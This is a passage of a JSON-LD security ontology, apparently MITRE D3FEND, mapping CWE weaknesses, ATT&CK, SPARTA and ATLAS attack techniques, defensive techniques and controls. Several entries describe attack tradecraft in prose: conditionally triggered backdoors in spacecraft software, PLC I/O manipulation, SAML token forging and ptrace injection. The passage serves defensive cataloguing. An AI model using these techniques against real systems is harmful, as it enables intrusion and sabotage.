      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1120",
      "d3f:definition": "The code is too complex, as calculated using a well-defined, quantitative measure.",
      "rdfs:label": "Excessive Code Complexity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:PER-0002.02",
      "@type": "owl:Class",
      "d3f:attack-id": "PER-0002.02",
      "d3f:definition": "Software backdoors are code paths intentionally crafted or later inserted to provide privileged functionality on cue. In flight contexts, they appear as hidden command handlers, alternate authentication checks, special user/role constructs, or procedure/script hooks that accept nonpublic inputs. They can be embedded in flight applications, separation kernels or drivers, gateway processors that translate bus/payload traffic, or update/loader utilities that handle tables and images. SDR configurations offer another avenue: non-public waveforms, subcarriers, or framing profiles that, when selected, expose a private command channel. Activation is often conditional, specific timetags, geometry, message sequences, or file names, to keep the feature dormant during routine testing and operations. Once present, the backdoor provides a repeatable way to execute commands or modify state without traversing the standard control surfaces, sustaining the adversary’s access over time.",
      "rdfs:label": "Software Backdoor - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0002/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PER-0002"
      },
      "skos:prefLabel": "Software Backdoor"
    },
    {
      "@id": "d3f:CWE-52",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-52",
      "d3f:definition": "The product accepts path input in the form of multiple trailing slash ('/multiple/trailing/slash//') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: '/multiple/trailing/slash//'",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-163"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:T0835",
      "@type": "owl:Class",
      "d3f:attack-id": "T0835",
      "d3f:definition": "Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Dr. Kelvin T. Erickson December 2010) During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLC's internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules.",
      "rdfs:label": "Manipulate I/O Image - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Manipulate I/O Image"
    },
    {
      "@id": "d3f:T1021",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1021",
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.",
      "d3f:produces": {
        "@id": "d3f:IntranetNetworkTraffic"
      },
      "rdfs:label": "Remote Services",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:N60f001fc8fc44260b3dea50a2467b367"
        }
      ]
    },
    {
      "@id": "_:N60f001fc8fc44260b3dea50a2467b367",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:UserInitScript",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A script used to initialize and configure elements of the user's applications and user environment.",
      "rdfs:label": "User Init Script",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutableScript"
        },
        {
          "@id": "d3f:InitScript"
        },
        {
          "@id": "d3f:UserLogonInitResource"
        }
      ]
    },
    {
      "@id": "d3f:T1655",
      "@type": "owl:Class",
      "d3f:attack-id": "T1655",
      "d3f:definition": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name, location, or appearance of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.",
      "rdfs:label": "Masquerading - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Masquerading"
    },
    {
      "@id": "d3f:AML.T0034",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0034",
      "d3f:definition": "Adversaries may target different AI services to send useless queries or computationally expensive inputs to increase the cost of running services at the victim organization.\nSponge examples are a particular type of adversarial data designed to maximize energy consumption and thus operating cost.",
      "rdfs:label": "Cost Harvesting - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0034"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASImpactTechnique"
      },
      "skos:prefLabel": "Cost Harvesting"
    },
    {
      "@id": "d3f:T1531",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1531",
      "d3f:definition": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)",
      "d3f:modifies": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Account Access Removal",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ImpactTechnique"
        },
        {
          "@id": "_:N0f2400e7390047ec98a9c107610e2a4d"
        }
      ]
    },
    {
      "@id": "_:N0f2400e7390047ec98a9c107610e2a4d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Least Privilege | Privileged Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "AC-6(5)"
    },
    {
      "@id": "d3f:ElectronicLockMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ElectronicLockMonitoring"
      ],
      "d3f:d3fend-id": "D3-ELM",
      "d3f:definition": "Monitoring electronic lock and door hardware states and access events (e.g., locked/unlocked, access granted/denied, door forced/held, tamper) to detect and respond to unauthorized entry.",
      "d3f:kb-article": "## How it works\n\nElectronic lock monitoring collects status and events from door controllers, readers (badge/PIV, keypad), and door hardware (door position switch, request-to-exit, bolt/latch, tamper). The physical access control system (PACS) logs access decisions, correlates door-held/forced conditions, and generates alarms for response. Secure, supervised reader links, such as Open Supervised Device Protocol (OSDP), help detect wiring faults and reduce credential interception. Integration with video systems can pop relevant camera views on lock-related alarms.\n\n## Considerations\n\n* Use encrypted, supervised reader-to-controller protocols to protect credentials and detect wiring faults.\n* Harden door controllers and isolate the PACS network to limit the attack surface.\n* Configure fail-safe or fail-secure behavior and emergency release to meet life-safety requirements.\n* Tune alarms for door-held, door-forced, and invalid retries to reduce noise while catching misuse.\n* Supervise inputs, provide backup power, and regularly test door, bolt, and tamper sensors to ensure reliability.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FIPS-201-3"
        },
        {
          "@id": "d3f:Reference-NIST-SP800-116r1"
        },
        {
          "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
        },
        {
          "@id": "d3f:Reference-SIA-OSDP-2-2"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:ElectronicCombinationLock"
      },
      "d3f:synonym": [
        "Door Lock Monitoring",
        "Lock State Monitoring"
      ],
      "rdfs:label": "Electronic Lock Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessMonitoring"
        },
        {
          "@id": "_:N87d65343e5b5470e9555ae7659da4d3a"
        }
      ]
    },
    {
      "@id": "_:N87d65343e5b5470e9555ae7659da4d3a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ElectronicCombinationLock"
      }
    },
    {
      "@id": "d3f:WHOISCompatibleDomainRegistration",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DomainRegistration"
      ],
      "rdfs:label": "WHOIS Compatible Domain Registration"
    },
    {
      "@id": "d3f:DHCPReleaseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP client sends a RELEASE message to relinquish its assigned IP address and cancel any remaining lease duration.",
      "rdfs:label": "DHCP Release Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DHCPEvent"
        },
        {
          "@id": "_:N984fcccb49e24c6382643069c6af4330"
        }
      ],
      "skos:altLabel": "DHCPRELEASE"
    },
    {
      "@id": "_:N984fcccb49e24c6382643069c6af4330",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPAckEvent"
      }
    },
    {
      "@id": "d3f:CWE-65",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-65",
      "d3f:definition": "The product, when opening a file or directory, does not sufficiently handle when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.",
      "rdfs:label": "Windows Hard Link",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-59"
      }
    },
    {
      "@id": "d3f:CWE-414",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-414",
      "d3f:definition": "A product does not check to see if a lock is present before performing sensitive operations on a resource.",
      "rdfs:label": "Missing Lock Check",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:M1031",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "Network Intrusion Prevention"
    },
    {
      "@id": "d3f:T1401",
      "@type": "owl:Class",
      "d3f:attack-id": "T1401",
      "d3f:definition": "Adversaries may request device administrator permissions to perform malicious actions.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1626.001",
      "rdfs:label": "Device Administrator Permissions - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1626.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique"
      },
      "skos:prefLabel": "Device Administrator Permissions"
    },
    {
      "@id": "d3f:MicrosoftHTMLApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript.",
      "d3f:may-contain": {
        "@id": "d3f:ExecutableScript"
      },
      "d3f:synonym": "HTA",
      "rdfs:isDefinedBy": {
        "@id": "dbr:HTML_Application"
      },
      "rdfs:label": "Microsoft HTML Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HTMLFile"
        },
        {
          "@id": "_:Nfffd96069f7d47b8b44cac4f6e86c7be"
        }
      ]
    },
    {
      "@id": "_:Nfffd96069f7d47b8b44cac4f6e86c7be",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:CWE-1050",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1050",
      "d3f:definition": "The product has a loop body or loop condition that contains a control element that directly or indirectly consumes platform resources, e.g. messaging, sessions, locks, or file descriptors.",
      "rdfs:label": "Excessive Platform Resource Consumption within a Loop",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:stage",
      "@type": [
        "owl:DatatypeProperty",
        "owl:FunctionalProperty"
      ],
      "rdfs:label": "stage",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "_:Nf830dd3f129a45fbb3d28d1578625cd5",
      "@type": "owl:AllDisjointClasses",
      "owl:members": {
        "@list": [
          {
            "@id": "d3f:Clustering"
          },
          {
            "@id": "d3f:Grouping"
          },
          {
            "@id": "d3f:Histogramming"
          }
        ]
      }
    },
    {
      "@id": "d3f:Router",
      "@type": "owl:Class",
      "d3f:definition": "A router is a networking device that forwards data packets between computer networks. Routers perform the traffic directing functions on the Internet. Data sent through the internet, such as a web page or email, is in the form of data packets. A packet is typically forwarded from one router to another router through the networks that constitute an internetwork (e.g. the Internet) until it reaches its destination node.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Router_(computing)"
      },
      "rdfs:label": "Router",
      "rdfs:subClassOf": {
        "@id": "d3f:ComputerNetworkNode"
      }
    },
    {
      "@id": "d3f:PE32PLUSExecutableFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableBinary"
      ],
      "rdfs:label": "PE32+ Executable File"
    },
    {
      "@id": "d3f:Procedure",
      "@type": "owl:Class",
      "rdfs:label": "Procedure",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Plan"
        },
        {
          "@id": "_:Nff4756362af6433fa98eef79b0eeaa6f"
        },
        {
          "@id": "_:Na33cfe2ab9814d3f8c88bce523fecc4a"
        }
      ]
    },
    {
      "@id": "_:Nff4756362af6433fa98eef79b0eeaa6f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implements"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Technique"
      }
    },
    {
      "@id": "_:Na33cfe2ab9814d3f8c88bce523fecc4a",
      "@type": "owl:Restriction",
      "owl:allValuesFrom": {
        "@id": "d3f:Step"
      },
      "owl:onProperty": {
        "@id": "d3f:start"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingSuspiciousAdministrativeActivity_VectraNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180077186A1"
      },
      "d3f:kb-abstract": "Disclosed is an improved approach for identifying suspicious administrative host activity within a network. Network traffic is examined to learn the behavior of hosts within a network. This provides an effective way of determining whether or not a host is performing suspicious activity over an administrative protocol.",
      "d3f:kb-author": "Nicolas Beauchesne; Kevin Song-Kai Ni",
      "d3f:kb-mitre-analysis": "Collect network traffic metadata directed at administrative services over a period of time to establish a baseline. This baseline is then used to determine suspicious activity that falls outside of the established baseline.",
      "d3f:kb-organization": "Vectra Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:AdministrativeNetworkActivityAnalysis"
      },
      "d3f:kb-reference-title": "Method and system for detecting suspicious administrative activity",
      "rdfs:label": "Reference - Method and system for detecting suspicious administrative activity - Vectra Networks Inc"
    },
    {
      "@id": "d3f:Group",
      "@type": "owl:Class",
      "rdfs:label": "Group",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:SharedComputer",
      "@type": "owl:Class",
      "d3f:definition": "A computer whose resources are intended to be shared widely.",
      "rdfs:label": "Shared Computer",
      "rdfs:seeAlso": {
        "@id": "dbr:Time-sharing"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ClientComputer"
      }
    },
    {
      "@id": "d3f:SSHEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Secure Shell (SSH) protocol, a cryptographic network protocol designed to provide secure remote login, command execution, and data transfer. SSH facilitates encrypted communication between clients and servers, ensuring confidentiality, integrity, and authenticity.",
      "rdfs:label": "SSH Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/ssh_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:TCPEvent"
        },
        {
          "@id": "_:N24a2246a9851423788caa731d9202689"
        }
      ]
    },
    {
      "@id": "_:N24a2246a9851423788caa731d9202689",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SSHSession"
      }
    },
    {
      "@id": "d3f:CWE-676",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-676",
      "d3f:definition": "The product invokes a potentially dangerous function that could introduce a vulnerability if it is used incorrectly, but the function can also be used safely.",
      "rdfs:label": "Use of Potentially Dangerous Function",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1177"
      }
    },
    {
      "@id": "d3f:T1609",
      "@type": "owl:Class",
      "d3f:attack-id": "T1609",
      "d3f:definition": "Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)",
      "rdfs:label": "Container Administration Command",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:FileContentRules",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileContentRules"
      ],
      "d3f:d3fend-id": "D3-FCR",
      "d3f:definition": "Employing a pattern matching rule language to analyze the content of files.",
      "d3f:kb-article": "## How it works\nRules, often called signatures, are used for both generic and targeted malware detection. The rules are usually expressed in a domain-specific language (DSL), then deployed to software that scans files for matches. The rules are developed and broadly distributed by commercial vendors, or they are developed and deployed by enterprise security teams to address highly targeted or custom malware. Conceptually, there are public and private rule sets. Both leverage the same technology, but they are intended to detect different types of cyber adversaries.\n\n## Considerations\n* Patterns expressed in the DSLs range in their complexity. Some scanning engines support file parsing and normalization for high-fidelity matching; others support only simple regular expression matching against raw file data. Engineers must make a trade-off in terms of:\n     * The fidelity of the matching capabilities in order to balance high recall with avoiding false positives,\n     * The computational load for scanning, and\n     * The resilience of the engine to deal with adversarial content presented in different forms; in some cases that content is designed to exploit or defeat the scanning engines.\n * Signature libraries can become large over time and impact scanning performance.\n * Some vendors who sell signatures have to delete old signatures over time.\n * Simple signatures against raw content cannot match against encoded, encrypted, or sufficiently obfuscated content.\n\n## Implementations\n * YARA\n * ClamAV",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ComputationalModelingAndClassificationOfDataStreams_CrowdstrikeInc"
        },
        {
          "@id": "d3f:Reference-DetectingScript-basedMalware_CrowdstrikeInc"
        },
        {
          "@id": "d3f:Reference-DistributedMeta-informationQueryInANetwork_Bit9Inc"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodsThereofForLogicalIdentificationOfMaliciousThreatsAcrossAPluralityOfEnd-pointDevicesCommunicativelyConnectedByANetwork_PaloAltoNetworksIncCyberSecdoLtd"
        }
      ],
      "d3f:synonym": [
        "File Content Signatures",
        "File Signatures"
      ],
      "rdfs:label": "File Content Rules",
      "rdfs:subClassOf": {
        "@id": "d3f:FileContentAnalysis"
      }
    },
    {
      "@id": "d3f:ImageFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A file that contains graphics data.",
      "rdfs:label": "Image File",
      "rdfs:subClassOf": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:MicrosoftWordWBKFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word WBK File"
    },
    {
      "@id": "d3f:CWE-597",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-597",
      "d3f:definition": "The product uses the wrong operator when comparing a string, such as using \"==\" when the .equals() method should be used instead.",
      "rdfs:label": "Use of Wrong Operator in String Comparison",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-480"
        },
        {
          "@id": "d3f:CWE-595"
        }
      ]
    },
    {
      "@id": "d3f:T1631.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1631.001",
      "d3f:definition": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.",
      "rdfs:label": "Ptrace System Calls - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1631"
      },
      "skos:prefLabel": "Ptrace System Calls"
    },
    {
      "@id": "d3f:OTController",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:OTControlProgram"
      },
      "d3f:definition": "An OT Controller is an industrial control device that automatically regulates one or more controlled variables in response to command inputs and real-time feedback signals.",
      "d3f:has-operating-mode": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "d3f:manages": {
        "@id": "d3f:OTControlLogicProcess"
      },
      "d3f:powered-by": {
        "@id": "d3f:OTPowerSupply"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://csrc.nist.gov/glossary/term/controller"
      },
      "rdfs:label": "OT Controller",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEmbeddedComputer"
        },
        {
          "@id": "_:N885c14846ab84b6385a3587f3dac5499"
        },
        {
          "@id": "_:Nc12d0ae4599f48cd9f5848704136a00b"
        },
        {
          "@id": "_:N870a26e3cbec4d1f8be3a2093a6b9039"
        },
        {
          "@id": "_:N3b26b69a0e04438484db4d814891959b"
        }
      ]
    },
    {
      "@id": "_:N885c14846ab84b6385a3587f3dac5499",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "_:Nc12d0ae4599f48cd9f5848704136a00b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-operating-mode"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:N870a26e3cbec4d1f8be3a2093a6b9039",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlLogicProcess"
      }
    },
    {
      "@id": "_:N3b26b69a0e04438484db4d814891959b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:powered-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTPowerSupply"
      }
    },
    {
      "@id": "d3f:ClientApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A client application is software that accesses a service made available by a server. The server is often (but not always) on another computer system, in which case the client accesses the service by way of a network. The term applies to the role that programs or devices play in the client-server model.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Client_(computing)"
      },
      "rdfs:label": "Client Application",
      "rdfs:seeAlso": {
        "@id": "d3f:T1554"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:M1021",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "M1021's scope is broad; it touches on a wide variety of techniques in D3FEND.",
      "d3f:related": [
        {
          "@id": "d3f:DNSAllowlisting"
        },
        {
          "@id": "d3f:DNSDenylisting"
        },
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        },
        {
          "@id": "d3f:URLAnalysis"
        }
      ],
      "rdfs:label": "Restrict Web-Based Content"
    },
    {
      "@id": "d3f:T1606.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1606.002",
      "d3f:definition": "An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)",
      "rdfs:label": "SAML Tokens",
      "rdfs:subClassOf": {
        "@id": "d3f:T1606"
      }
    },
    {
      "@id": "d3f:T1608.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608.001",
      "d3f:definition": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.",
      "rdfs:label": "Upload Malware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1608"
      }
    },
    {
      "@id": "d3f:RDPInitialResponseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an RDP server responds to an initial request from a client, presenting its supported capabilities and agreeing to proceed with session negotiation.",
      "rdfs:label": "RDP Initial Response Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RDPEvent"
        },
        {
          "@id": "_:N391306d2de2840f79f799605d21f5c8c"
        }
      ]
    },
    {
      "@id": "_:N391306d2de2840f79f799605d21f5c8c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RDPInitialRequestEvent"
      }
    },
    {
      "@id": "d3f:T1480",
      "@type": "owl:Class",
      "d3f:attack-id": "T1480",
      "d3f:definition": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)",
      "rdfs:label": "Execution Guardrails",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CCI-000764_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        },
        {
          "@id": "d3f:Multi-factorAuthentication"
        },
        {
          "@id": "d3f:One-timePassword"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely identifies and authenticates organizational users (or processes acting on behalf of organizational users).",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000764"
    },
    {
      "@id": "d3f:CWE-788",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-788",
      "d3f:definition": "The product reads or writes to a buffer using an index or pointer that references a memory location after the end of the buffer.",
      "rdfs:label": "Access of Memory Location After End of Buffer",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-119"
      }
    },
    {
      "@id": "d3f:CWE-805",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-805",
      "d3f:definition": "The product uses a sequential operation to read or write a buffer, but it uses an incorrect length value that causes it to access memory that is outside of the bounds of the buffer.",
      "rdfs:label": "Buffer Access with Incorrect Length Value",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-119"
      }
    },
    {
      "@id": "d3f:RegSetValueExW",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SetSystemConfigValue"
      ],
      "rdfs:label": "RegSetValueExW"
    },
    {
      "@id": "d3f:MailNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Email"
      },
      "d3f:definition": "Mail traffic is network traffic that uses a standard mail transfer protocol.",
      "rdfs:label": "Mail Network Traffic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTraffic"
        },
        {
          "@id": "_:Ne38f7a0f1a8746b2bb1e4e06b29509f6"
        }
      ]
    },
    {
      "@id": "_:Ne38f7a0f1a8746b2bb1e4e06b29509f6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:CAPEC-663",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CommonAttackPattern"
      ],
      "d3f:capec-id": "CAPEC-663",
      "rdfs:isDefinedBy": {
        "@id": "https://capec.mitre.org/data/definitions/663.html"
      },
      "rdfs:label": "Exploitation of Transient Instruction Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CommonAttackPattern"
      }
    },
    {
      "@id": "d3f:CWE-797",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-797",
      "d3f:definition": "The product receives data from an upstream component, but only accounts for special elements at an absolute position (e.g. \"byte number 10\"), thereby missing remaining special elements that may exist before sending it to a downstream component.",
      "rdfs:label": "Only Filtering Special Elements at an Absolute Position",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-795"
      }
    },
    {
      "@id": "d3f:AgglomerativeClustering",
